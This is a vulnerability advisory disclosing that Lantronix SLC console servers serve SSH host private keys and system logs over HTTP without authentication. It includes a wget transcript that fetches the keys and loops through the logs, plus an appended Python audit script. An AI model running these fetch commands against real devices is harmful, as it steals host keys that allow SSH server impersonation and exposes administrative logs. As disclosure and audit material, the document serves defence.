Hi,

I stumbled on another bug during my review for console servers:

Summary: Lantronix SecureLinx console server: retrieval of SSH private keys and system logfiles

Confirmed on SLC32, software version 2.0, 3.0; very likely on all models of the SLC series (SLC8, 16, 32, 48)
www.lantronix.com

Details:

Lantronix console servers come with a mini_httpd whose configuration does not restrict access to the subdirectories of DocumentRoot, and which does not care about the Unix permissions of the files below it: the host keys are mode 0600 and owned by root, and are served anyway. Lantronix SLCs have their /etc directory, SSH host keys included, below DocumentRoot. One can easily retrieve the SSH host private keys over the network without providing credentials, so anyone who can reach the web interface can impersonate the SLC's SSH server, rendering SSH encryption close to useless.

Also one can read logfiles over the network. Though the directory is named /cifsshare/logs/, it contains system logs, potentially also sniffer logs from serial console sessions. Note that console servers provide administrative console access to the devices hooked up to their serial lines (up to 48).

Vulnerable Versions: Vendor confirmation for SLC series, firmware 2.0 (researched), 3.0 (current)

Patches/Workarounds: Bugfix pending. Vendor is working on 3.1, to be released in August. Supposedly fixed by then. Until then, restrict network access to the SLC's web interface. Since the keys may already have been read by anyone who could reach the device, the SSH host keys should be regenerated once the fix is installed.

"Exploit":
%%%%%%%%%%%%%%%%
myprompt:~ # ssh slc
The authenticity of host 'slc (192.168.50.205)' can't be established.
RSA key fingerprint is d5:d8:93:33:db:b3:80:91:74:79:be:e7:ff:f6:c6:41.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'slc,192.168.50.205' (RSA) to the list of known hosts.

Welcome to the SLC
login: root
Password:
Connection to slc closed.

myprompt:~ # tail -1 .ssh/known_hosts
slc,192.168.50.205 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA9FZwKSNlfAl72aWewoXE1e8g099yCSqVKGTRWSkOBKV8oqVgX8ryj/adwSLbwxSi8HyLd9AfiNmyyTJ4/ITX4JgpNCcw8k6SNK3HrletSs7z4EGHiYcB25gIgX6fQrnjkm1AP3HXR0Wkeg7B5wFqwqKkNUd/aPhegLxjpufB0g0=

myprompt:~ # wget -q -O - https://slc/etc

Index of etc/

-rw-------    1 root          672 Jan  1  1970 ssh_host_dsa_key
-rw-r--r--    1 root          601 Jan  1  1970 ssh_host_dsa_key.pub
-rw-------    1 root          526 Jan  1  1970 ssh_host_key
-rw-r--r--    1 root          330 Jan  1  1970 ssh_host_key.pub
-rw-------    1 root          883 Jan  1  1970 ssh_host_rsa_key
-rw-r--r--    1 root          221 Jan  1  1970 ssh_host_rsa_key.pub

mini_httpd/1.15c 02may2001
myprompt:~ # wget -q -O - https://slc/etc/ssh_host_rsa_key.pub
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA9FZwKSNlfAl72aWewoXE1e8g099yCSqVKGTRWSkOBKV8oqVgX8ryj/adwSLbwxSi8HyLd9AfiNmyyTJ4/ITX4JgpNCcw8k6SNK3HrletSs7z4EGHiYcB25gIgX6fQrnjkm1AP3HXR0Wkeg7B5wFqwqKkNUd/aPhegLxjpufB0g0= root@(none)

myprompt:~ # wget -q -O - https://slc/etc/ssh_host_rsa_key | grep -w KEY
-----BEGIN RSA PRIVATE KEY-----
-----END RSA PRIVATE KEY-----

myprompt:~ # wget -q -O - https://slc/etc/ssh_host_dsa_key | grep -w KEY
-----BEGIN DSA PRIVATE KEY-----
-----END DSA PRIVATE KEY-----

myprompt:~ # wget -O - -q https://slc/cifsshare/logs/

Index of cifsshare/logs/

lrwxrwxrwx  Oct  21  2004 authentication  -> ../../../var/log/secure
lrwxrwxrwx  Oct  21  2004 devports  -> ../../../var/log/devports
lrwxrwxrwx  Oct  21  2004 diag  -> ../../../var/log/diag
lrwxrwxrwx  Oct  21  2004 general  -> ../../../var/log/general
lrwxrwxrwx  Oct  21  2004 network  -> ../../../var/log/network
lrwxrwxrwx  Oct  21  2004 services  -> ../../../var/log/services
lrwxrwxrwx  Oct  21  2004 sw  -> ../../../var/log/sw

mini_httpd/1.15c 02may2001
myprompt:~ # for i in `lynx -dump -nolist https://slc/cifsshare/logs/ | awk '{ print $5 }'`; do echo; echo ---$i---; wget -O - -q https://slc/cifsshare/logs/$i; done
[.. too long to list it here, but you have enough fantasy ..]
%%%%%%%%%%%%%%%%

more to come.

Cheers, Dirk

-- 
Dr. Dirk Wetter                          http://drwetter.org
Consulting IT-Security + Open Source
Key fingerprint = 80A2 742B 8195 969C 5FA6 6584 8B6E 59C1 E41B 9153
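The two checks a reviewer wants to automate from the transcript above, as an added example that is not part of Dirk's post or of the Lantronix firmware: walk a mini_httpd-style index listing and flag entries that should never be web-readable (files whose Unix mode denies "other" read, and symlinks that lead out of DocumentRoot), recognise PEM private key material in a fetched body, and confirm that the .pub served next to the private key is the very host key the ssh client just stored in known_hosts, i.e. that the exposed private key is the host's real identity. The listings and the key blob are constructed from what the post shows; nothing is fetched over the network, so the fetch step itself (wget, as in the post) is left to the reader. The MD5 fingerprint function reproduces the format of the client's "RSA key fingerprint is ..." prompt; the value it prints for the blob above should be compared against the one in the transcript.

```python
import base64
import hashlib
import re
import struct

# Constructed sample input: the plain-text index listings as they appear in
# the post (mini_httpd's HTML index rendered to text), and the host key blob
# from the post's known_hosts line and ssh_host_rsa_key.pub.
ETC_LISTING = """\
Index of etc/

-rw-------    1 root          672 Jan  1  1970 ssh_host_dsa_key
-rw-r--r--    1 root          601 Jan  1  1970 ssh_host_dsa_key.pub
-rw-------    1 root          526 Jan  1  1970 ssh_host_key
-rw-r--r--    1 root          330 Jan  1  1970 ssh_host_key.pub
-rw-------    1 root          883 Jan  1  1970 ssh_host_rsa_key
-rw-r--r--    1 root          221 Jan  1  1970 ssh_host_rsa_key.pub

mini_httpd/1.15c 02may2001
"""

LOGS_LISTING = """\
Index of cifsshare/logs/

lrwxrwxrwx  Oct  21  2004 authentication  -> ../../../var/log/secure
lrwxrwxrwx  Oct  21  2004 devports  -> ../../../var/log/devports

mini_httpd/1.15c 02may2001
"""

KEY_BLOB = ("AAAAB3NzaC1yc2EAAAABIwAAAIEA9FZwKSNlfAl72aWewoXE1e8g099yCSqVKGTRWSkOBKV8"
            "oqVgX8ryj/adwSLbwxSi8HyLd9AfiNmyyTJ4/ITX4JgpNCcw8k6SNK3HrletSs7z4EGHiYcB25gIgX6f"
            "Qrnjkm1AP3HXR0Wkeg7B5wFqwqKkNUd/aPhegLxjpufB0g0=")
KNOWN_HOSTS_LINE = "slc,192.168.50.205 ssh-rsa " + KEY_BLOB
PUB_FILE_LINE = "ssh-rsa " + KEY_BLOB + " root@(none)"

MODE_RE = re.compile(r"^[-ld][rwxsStT-]{9}")
PEM_PRIVATE_RE = re.compile(rb"^-----BEGIN (?:\w+ )?PRIVATE KEY-----", re.M)


def parse_listing(text):
    """Turn an index listing into (mode, name, symlink_target) tuples.
    Only lines starting with a Unix mode string are entries; the title and
    the server banner are skipped."""
    entries = []
    for line in text.splitlines():
        if not MODE_RE.match(line):
            continue
        left, _, target = line.partition(" -> ")
        entries.append((line[:10], left.split()[-1], target.strip() or None))
    return entries


def audit_listing(entries):
    """Flag what a reviewer should fetch next: regular files whose mode
    denies 'other' read (the web server serves them anyway, running as
    root) and symlinks that leave DocumentRoot through '..'."""
    findings = []
    for mode, name, target in entries:
        if mode[0] == "-" and mode[7] == "-":
            findings.append((name, "not world-readable on disk, yet served over HTTP"))
        elif mode[0] == "l" and target and target.startswith(".."):
            findings.append((name, "symlink leaves DocumentRoot: " + target))
    return findings


def is_private_key(body):
    """True if a fetched body is PEM private key material (RSA, DSA, ...)."""
    return PEM_PRIVATE_RE.search(body) is not None


def parse_ssh_pubkey(blob_b64):
    """Split an SSH wire-format public key blob into its length-prefixed
    fields; for ssh-rsa that is [key type, e, n]."""
    raw = base64.b64decode(blob_b64)
    fields, off = [], 0
    while off + 4 <= len(raw):
        (n,) = struct.unpack(">I", raw[off:off + 4])
        fields.append(raw[off + 4:off + 4 + n])
        off += 4 + n
    if off != len(raw):
        raise ValueError("trailing bytes in key blob")
    return fields


def md5_fingerprint(blob_b64):
    """Colon-separated MD5 fingerprint, the format of the ssh client's
    'RSA key fingerprint is ...' prompt."""
    digest = hashlib.md5(base64.b64decode(blob_b64)).hexdigest()
    return ":".join(digest[i:i + 2] for i in range(0, 32, 2))


def served_key_is_host_identity(pub_file_line, known_hosts_line):
    """True if the .pub served over HTTP carries the same key type and blob
    that ssh stored in known_hosts: the private key served beside it is then
    the host's real identity and allows impersonating the SLC."""
    pub_type, pub_blob = pub_file_line.split()[:2]
    _, kh_type, kh_blob = known_hosts_line.split()[:3]
    return pub_type == kh_type and pub_blob == kh_blob


if __name__ == "__main__":
    for listing in (ETC_LISTING, LOGS_LISTING):
        for name, why in audit_listing(parse_listing(listing)):
            print(f"{name}: {why}")
    print("served key matches known_hosts:",
          served_key_is_host_identity(PUB_FILE_LINE, KNOWN_HOSTS_LINE))
    print("fingerprint of served key:", md5_fingerprint(KEY_BLOB))
```

In a real run the bodies returned by wget for each flagged name are passed to is_private_key, and a hit on a file that the listing shows as mode 0600 is the whole finding: the permissions that protect the key from local users mean nothing to a web server that reads the file as root.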